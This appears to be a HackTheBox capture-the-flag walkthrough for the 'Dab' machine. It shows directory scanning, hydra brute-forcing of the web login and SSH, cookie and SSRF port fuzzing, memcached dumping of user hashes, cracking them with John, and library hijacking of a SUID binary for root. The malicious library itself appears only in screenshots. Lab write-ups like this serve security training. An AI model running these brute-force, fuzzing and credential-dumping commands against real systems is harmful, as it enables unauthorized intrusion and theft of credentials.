> For the complete documentation index, see [llms.txt](https://akshaydeepakshinde.gitbook.io/hackthebox-linux/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://akshaydeepakshinde.gitbook.io/hackthebox-linux/hackthebox-dab.md).

# HackTheBox - Dab

![](/files/-MYodHNAV6S1aMdHbsS-)

### Nmap scan results (Basic and all port scan)

![](/files/-MYodPLQbENGwxvgHJIo)

### Using gobuster to scan the webpage on port 80 and 8080

```
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dab.htb/ -o gobuster-80-scan.out

# cat gobuster-80-scan.out 
/login                (Status: 200) [Size: 473]
/logout               (Status: 302) [Size: 209] [--> http://dab.htb/]
 
```

```
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://dab.htb:8080/ -o gobuster-8080-scan.out

# cat gobuster-8080-scan.out 
/socket               (Status: 200) [Size: 287]

```

### Bruteforcing the login page on port 80

```
hydra -l admin -P /opt/SecLists/Passwords/Common-Credentials/10k-most-common.txt 10.10.10.86 http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Error: Login failed."
```

### Testing the webpage on port 8080

The root page shows the following error. `Access denied: password authentication cookie not set`

I created a wordlist using the word `password` and `authentication` in it.

![](/files/-MYog7TIiB0DOaAFAAKW)

We will use the Burp's Suite Intruder Tab to FUZZ the cookie name.

![](/files/-MYogWuULA-YvvyXtktv)

![](/files/-MYogZ6uPJeUghHEXcOM)

![](/files/-MYoggdq1weaBHgejtID)

Now let's fuzz the value for cookie using wfuzz.

```
wfuzz -c -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 29 -u http://dab.htb:8080/ -b 'password=FUZZ'
```

![](/files/-MYohtetQ9Zz0uUbzcPR)

![](/files/-MYoi1lkW8WdG9xZBQl6)

### Searching for open ports (SSRF Fuzzing)

```
ffuf -w ports.txt -u "http://dab.htb:8080/socket?port=FUZZ&cmd=localhost" -b 'password=secret' -c
```

![](/files/-MYoitPmxRgkkBvPMPdM)

### Pentesting Memcache (Running on port 11211)

{% hint style="info" %}
&#x20;**Memcached** is an open-source distributed memory object caching program that allows us to improve and speed up the performance of dynamic web applications by caching data and objects in Memory. **Memcached** is also used to cache entire database tables and queries to improve the performance of the database.
{% endhint %}

**References**: <https://book.hacktricks.xyz/pentesting/11211-memcache>

```bash
#Commands to be used
stats
version
stats slabs
stats items
stats cachedump <number> 0
get <item-name>
```

![](/files/-MYok-7Jn2PaEVubgVv3)

![](/files/-MYok2GTDy3UWgSFL66w)

**Getting slabs**&#x20;

![](/files/-MYokIss8LTV_cXx5Jp0)

![](/files/-MYoke3iZ_iclG0UyAYN)

**Getting items with info**

![](/files/-MYokn627vPiIQDX1Jx6)

![](/files/-MYokq-9vK59W3PNDTdP)

**Getting key names ( 0 is for unlimited output)**

![](/files/-MYolEYRVeGryYNVgPsy)

![](/files/-MYolH_JOhC--d4ZKLHH)

![](/files/-MYolLjHXnMraO3YWwEJ)

![](/files/-MYolP16LaB-eWkKyymr)

To get the users `ITEM`, we can use the `get users` command.

If we use the following command, we won't get any data. This is because of no cache generated recently. Let's logout and login again and then try to get the data.

![](/files/-MYommZk4xpb9s11xb0g)

![](/files/-MYompbtrueq2b3dyKCQ)

### Hash cracking using John

Let's get this data and apply some BashFu skills to organize the data.

![](/files/-MYonENvs0uL5agPQZeV)

![](/files/-MYou_-2tREu-TCAz0zq)

Bash command used: `cat users.json | jq | awk -F\" '{print $2,$4}' | sed -r 's/ /:/g' > userpass.txt`

![](/files/-MYouyV5Z8Ym-UUuLuMu)

### Bruteforcing SSH using hydra

![](/files/-MYovdhRI3dMTj5lUvEU)

![](/files/-MYovrlBTfifMZA9LRym)

### Using find command to search for SUID files

![](/files/-MYowKiNcbIBC6Gvfmd9)

`/usr/bin/myexec` looks suspicious, we can get that file using netcat.

![](/files/-MYowgUXZ3gxufFsMfkE)

### Analyzing the *myexec* binary in Ghidra

**Main Function:**&#x20;

![](/files/-MYox9KQhSNIE9zk5vGr)

To get the password stored, decode the hex value and the string that we get is `s3cur3l0g1n`

![](/files/-MYoxmPTJaaTSaSh72lU)

### Creating a malicious library to hijack seclogin()

So the `seclogin()` function isn't created yet, so this looks like a library hijacking binary.

![](/files/-MYoyG_Y2_fMFrxrc2Xa)

So the seclogin function is present in libcseclogin.so file, one can use `strings` on that binary or `readelf` to check.

Let's create a malicious library.

![](/files/-MYozZBle8Jl2TGu1x1y)

We can run ldconfig file as root, so let's do that.

![](/files/-MYozkRNMpF2mf9gXaa-)

![](/files/-MYoztra2kZmDYGZXOKe)
